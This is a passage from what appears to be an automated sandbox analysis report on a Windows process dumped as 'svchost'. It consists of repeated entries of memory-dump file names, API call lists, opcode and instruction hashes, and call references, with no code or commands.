          • Instruction Fuzzy Hash: 66E13372211AD586EF62CF26D8503ED77A0FB88BC8F449056EB8E4B669DF76C605C310
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ??3@$??2@FreeHeap$CreateInstance
          • String ID:
          • API String ID: 476970657-0
          • Opcode ID: 11c8ce8e7e0d1981926aa617da1213d9ca6a6b43375e24facf04d2d8059c808a
          • Instruction ID: 29537610e8d11700659b38353b7452f6f9fc0ea2a811a385638278bdb090ea32
          • Opcode Fuzzy Hash: 11c8ce8e7e0d1981926aa617da1213d9ca6a6b43375e24facf04d2d8059c808a
          • Instruction Fuzzy Hash: C1A15FB2205A8182EB62DF13B4507EFB3A4FB99BC5F045126EB8947BA5DF79C841C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: InfoSleepStartup_amsg_exit_cexit_inittermexit
          • String ID:
          • API String ID: 2456207614-0
          • Opcode ID: 5360f1c04b7edbaa5d775165d56065c574be986e94f26ab25caa58a34893f057
          • Instruction ID: dd7bef42800268433d42df4e9d168aee914250b00c3c1566757323a5b0bfa38a
          • Opcode Fuzzy Hash: 5360f1c04b7edbaa5d775165d56065c574be986e94f26ab25caa58a34893f057
          • Instruction Fuzzy Hash: 1951063160564086EB629F56E880BAA33F1F34C7C4F54442AFB8A8B6B5DB7AC985C741
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$_wtoi
          • String ID:
          • API String ID: 500119451-0
          • Opcode ID: cf2e6b14873cbda237f9802f76c90b55902cd014c2792bbb12101c55a9548aad
          • Instruction ID: 369d08c27aeb9e497d69f017f6d0c736d1be854fe5c0f34ec9398f35f1db6328
          • Opcode Fuzzy Hash: cf2e6b14873cbda237f9802f76c90b55902cd014c2792bbb12101c55a9548aad
          • Instruction Fuzzy Hash: DD516D72605B8482EB62DF57B8403ABA7A4F78DBD4F448025EF89437A5DF38C9958700
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap
          • String ID:
          • API String ID: 4134718113-0
          • Opcode ID: ed4153d8dbd31d6f314157dcbdedce6db1cc8a59a21d44a72ca7804b43617e2e
          • Instruction ID: 04baafabb85ef5c752686726c093db061e42867f807bf42f4ef44dac0b2fe2da
          • Opcode Fuzzy Hash: ed4153d8dbd31d6f314157dcbdedce6db1cc8a59a21d44a72ca7804b43617e2e
          • Instruction Fuzzy Hash: 47414D72205A8082EE62CF26E8503AA67A1FB8DFD9F044156EF8E577B9DF39C545C700
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: memset$_time64$??2@AddressFreeHeapHttpLibraryLoadOpenProc
          • String ID:
          • API String ID: 3106453554-0
          • Opcode ID: 8d1d217a09c486184b67123d1f67058338c9e71b8c42690334822dbe439251cf
          • Instruction ID: 8b04f6f2c231c0026719b809a071ef14e3336b76cfd83b8ab9bcfbeb16143b4b
          • Opcode Fuzzy Hash: 8d1d217a09c486184b67123d1f67058338c9e71b8c42690334822dbe439251cf
          • Instruction Fuzzy Hash: B7415BB2610B8082E756DF26F8543DA33A4FB48BC8F544129EB8D077A6DF39C555C780
          APIs
          • SysFreeString.OLEAUT32 ref: 000000014000EF92
          • HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFB0
          • HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFCB
          • HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F019
          • HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F049
          • HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F067
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$String
          • String ID:
          • API String ID: 2419388322-0
          • Opcode ID: be6e7307092a1a952a652f78f7010cba9a840ae09ac9c62c558f82d271d8ae95
          • Instruction ID: 2e050d31a97349d7cdf6a2b87fb76f8c7cecf5345a2535d832a4d2139c467b61
          • Opcode Fuzzy Hash: be6e7307092a1a952a652f78f7010cba9a840ae09ac9c62c558f82d271d8ae95
          • Instruction Fuzzy Hash: 9031F775201B8182EB96DF67E8503EA23A4F78DBC4F045126EB8A577B6CF39C8858750
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$String
          • String ID:
          • API String ID: 2419388322-0
          • Opcode ID: e9e0e31790792d4b0a460b2c6ecab48ab662761ac68e47726af6c54c1e2625d8
          • Instruction ID: 77b78661734df3ff0c0ddf4feed43cefbfa98e925e832546ec525beed8cc0a7a
          • Opcode Fuzzy Hash: e9e0e31790792d4b0a460b2c6ecab48ab662761ac68e47726af6c54c1e2625d8
          • Instruction Fuzzy Hash: 1F310675200B8582EB96EF57E84439A23A4F78DFC5F44411AEF8E5776ACE39C885C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: 768fc2b4c23c74d1e8dfd13da3aa98bb1163e70c91c34df0f9885c6c67c5b0d5
          • Instruction ID: cef34096d4367dcbd8395c8382d480f973210d14fd31fa0a13d25510343ea6c8
          • Opcode Fuzzy Hash: 768fc2b4c23c74d1e8dfd13da3aa98bb1163e70c91c34df0f9885c6c67c5b0d5
          • Instruction Fuzzy Hash: B2C16EB2200B8585EB62DF13A8407EA63A4F749BC8F44812AEF8D47BA5DF39C945C744
          APIs
          • memset.MSVCRT ref: 0000000140015981
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015B76
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015B90
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BAF
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BCE
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015BE8
          • HeapFree.KERNEL32(?,?,?,00000000,?,00000000,00000000,00000000,?,0000000140016753), ref: 0000000140015C02
            • Part of subcall function 000000014000CAF0: HeapFree.KERNEL32(?,?,00000000,000000014000DD66), ref: 000000014000CBAA
            • Part of subcall function 000000014000BFE0: HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000001400166BE), ref: 000000014000C080
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$memset
          • String ID:
          • API String ID: 631287834-0
          • Opcode ID: 24f8cd55a8a0ef05f4e9c24f79871f4228e885fe3935998ed1778025e6330dd8
          • Instruction ID: aed008c8da3fdc3c0ff40e812c2c567fdf27eb098b86fed716892b971eaa37ac
          • Opcode Fuzzy Hash: 24f8cd55a8a0ef05f4e9c24f79871f4228e885fe3935998ed1778025e6330dd8
          • Instruction Fuzzy Hash: 1281A231209784C5EAA6AB17A4803DAA794FB8DFC5F484115BF8D4FBB6DF3AC9058301
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$String$_wtoi
          • String ID:
          • API String ID: 2561507145-0
          • Opcode ID: 709da4c65bf113dccac99deeb3e18ea81a70b0b280e06bd9e3454a5568221bd6
          • Instruction ID: e59cfff288119f3f4f904d1b27c58b2d2babdf164cacf3d3f2fd8ee1a5d65ac5
          • Opcode Fuzzy Hash: 709da4c65bf113dccac99deeb3e18ea81a70b0b280e06bd9e3454a5568221bd6
          • Instruction Fuzzy Hash: F9914FB6305AC585EB61CF26E8503ED23A0FB88BC9F445066EB4D4BA68DF39C645C714
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeString$_wtoi
          • String ID:
          • API String ID: 4250654029-0
          • Opcode ID: 023a85d6e077abd36e9329ed64bb1b78fc74f23c4d0e9b6e5c5425238926549f
          • Instruction ID: b8226e3e0012d67e1dc081339e365a2b865a11d34d73dc99bed016e2b2b4d587
          • Opcode Fuzzy Hash: 023a85d6e077abd36e9329ed64bb1b78fc74f23c4d0e9b6e5c5425238926549f
          • Instruction Fuzzy Hash: 5871F972301AC585EB628F26D8507ED63B0FB88BC9F449166EB4D4BA68DF36C649C314
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ??3@$??2@CreateFreeHeapInstance_time64
          • String ID:
          • API String ID: 2253682078-0
          • Opcode ID: 6cc538e5723be706a6af699680bb8817cd703871eebb125ad8ef8b60cd1c5036
          • Instruction ID: 338fadbd8f023c31d53e71c2eb0ac7eaa7af4c98eb419c843f7b01db399d984e
          • Opcode Fuzzy Hash: 6cc538e5723be706a6af699680bb8817cd703871eebb125ad8ef8b60cd1c5036
          • Instruction Fuzzy Hash: B3515CB2200A8496EB62DF13E9907EA73A4F74CBC4F44412AEB8D47BA5DF38D955C700
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$_wtoi
          • String ID:
          • API String ID: 500119451-0
          • Opcode ID: c53852b301343a864bd44e2a01ece7f0478238a795bbedb566b2e1c3994f532d
          • Instruction ID: 92a92d2dbc5a60d20047751ba9c7231f8b4528c9a95bff77d31fe694f9f08b5a
          • Opcode Fuzzy Hash: c53852b301343a864bd44e2a01ece7f0478238a795bbedb566b2e1c3994f532d
          • Instruction Fuzzy Hash: 93417272201B4486F762DB57B8407EA66E0F78DBD8F458126EF4E47BA5DE3CC9858300
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap$Cleanupfreeaddrinfogetaddrinfo
          • String ID:
          • API String ID: 2229396415-0
          • Opcode ID: ad0a23ea1e3fab2e2f6dc1923229d74a235e8ba483d88328893647dd137214c9
          • Instruction ID: c73f167c002d392f22e7535e3b766fe4c5e56fea1bafe15927e8d13a21d43fb0
          • Opcode Fuzzy Hash: ad0a23ea1e3fab2e2f6dc1923229d74a235e8ba483d88328893647dd137214c9
          • Instruction Fuzzy Hash: C1418C76205BC085EB62DF62A8503EB73A0FB8EB89F404116EB8E47B69DF39C545C741
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: CleanupStartupfreeaddrinfogethostname
          • String ID:
          • API String ID: 252301257-0
          • Opcode ID: 1c7de7a7b739ff876f72758fab879ef31b66a72eb6dc2b419f8a8539415d4b0c
          • Instruction ID: 01925c6db1f8f3f86d9a40cb054dce826a2e1fef095a07c98b455f9550f0be45
          • Opcode Fuzzy Hash: 1c7de7a7b739ff876f72758fab879ef31b66a72eb6dc2b419f8a8539415d4b0c
          • Instruction Fuzzy Hash: D13132F12047C592FA72CB36B448BF963A3F38D7D0F544226AB95676E5CB38C895C610
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap
          • String ID:
          • API String ID: 4134718113-0
          • Opcode ID: 33a2060611cb8ec44a2f8ebbf3682c4b7cf822d20eecf976d1becbd4f745dd5e
          • Instruction ID: c7057bfe3fe1e259c7d9473786c2c13687bc0f68ae7fd6a9205dd21598a37846
          • Opcode Fuzzy Hash: 33a2060611cb8ec44a2f8ebbf3682c4b7cf822d20eecf976d1becbd4f745dd5e
          • Instruction Fuzzy Hash: 25218E36301A5082EE53DB67E8503AA6360FB8DFD9F144161EF8A4B774DE7AC849C700
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$String$Heap
          • String ID:
          • API String ID: 4134718113-0
          • Opcode ID: fccf0d1d76b4618596f9da56fba9d61feb00287a7068e73cca5b6a5a2edeb918
          • Instruction ID: 44dffc1b1623a4eb4a0fa9f924ccce8fcb8cef9b766d2aa3702618fef56f5325
          • Opcode Fuzzy Hash: fccf0d1d76b4618596f9da56fba9d61feb00287a7068e73cca5b6a5a2edeb918
          • Instruction Fuzzy Hash: A521503630165482EE53DB67E5903AA6360FB8DFD9F044565AF8A4B774DF7AC845C300
          APIs
            • Part of subcall function 00000001400162A0: GetFullPathNameW.KERNEL32 ref: 0000000140016398
          • _time64.MSVCRT ref: 0000000140016829
            • Part of subcall function 0000000140015C30: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015C5B
            • Part of subcall function 0000000140015C30: HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015CA0
            • Part of subcall function 0000000140015C30: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015CBA
            • Part of subcall function 000000014000EF60: SysFreeString.OLEAUT32 ref: 000000014000EF92
            • Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFB0
            • Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFCB
            • Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F019
            • Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F049
            • Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F067
          • ??3@YAXPEAX@Z.MSVCRT ref: 000000014001685F
            • Part of subcall function 0000000140015CF0: HeapFree.KERNEL32 ref: 0000000140015D5C
            • Part of subcall function 0000000140015CF0: HeapFree.KERNEL32 ref: 0000000140015DC9
          • _time64.MSVCRT ref: 000000014001687A
          • ??3@YAXPEAX@Z.MSVCRT ref: 00000001400168A5
          • HeapFree.KERNEL32 ref: 00000001400168BF
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$??3@$_time64$??2@FullNamePathString
          • String ID:
          • API String ID: 150110825-0
          • Opcode ID: b374972345a98aab7f111945121116fe8a8daca0d979d4b2eb55e00bc1de3434
          • Instruction ID: 3471c3c0471e6186058520ccdacb3bb8f8d6888c7ecbf9f9485eb0a86c61140c
          • Opcode Fuzzy Hash: b374972345a98aab7f111945121116fe8a8daca0d979d4b2eb55e00bc1de3434
          • Instruction Fuzzy Hash: F4216F31215B8582FE56EB63A8143EA63A0EB8DBC0F440125FF4E0B7B9DF3DC8018240
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
          • String ID:
          • API String ID: 1445889803-0
          • Opcode ID: ca367986e5882e155562448106f5efe6e8986abbd5978ec8722d427d7b5e0517
          • Instruction ID: 4282b2ffed1f1902788247a1ead55fe5c5022d60fe0a4bff3f2e92ceacb5a284
          • Opcode Fuzzy Hash: ca367986e5882e155562448106f5efe6e8986abbd5978ec8722d427d7b5e0517
          • Instruction Fuzzy Hash: CC012D31215B4486FB928F22E9843956360F74DBD0F446624FFAE4B7B4DA3DCA998740
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$AddressHeapLibraryLoadMemoryProcProcessVirtualWrite
          • String ID: @
          • API String ID: 3124392466-2766056989
          • Opcode ID: 1bb38f2ae01ba480db47f1e073e612a7f6dc02e3a34142393fbfcebefcc833bd
          • Instruction ID: b2a891423e6191926618ad547ba0af25c79efd8fa3015ad4a40756f249b59b8a
          • Opcode Fuzzy Hash: 1bb38f2ae01ba480db47f1e073e612a7f6dc02e3a34142393fbfcebefcc833bd
          • Instruction Fuzzy Hash: 3B612A32205BC585EB618F12E8507DAA3A4F788BD8F444026EFCD5BB69DF39C555CB00
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeap
          • String ID:
          • API String ID: 3298025750-0
          • Opcode ID: a22180b871657469462245d63a1df6603a5014c87e756b3b7c6317501a45b5d8
          • Instruction ID: 958cc02974dd490962601f4e5d7328da3ab7c70f1c6129f948b010f177f26f79
          • Opcode Fuzzy Hash: a22180b871657469462245d63a1df6603a5014c87e756b3b7c6317501a45b5d8
          • Instruction Fuzzy Hash: 46519CB2201B8482EA62DF57B9447DA63A1F78CBD4F584129EF8D47BA5DF38C8458740
          APIs
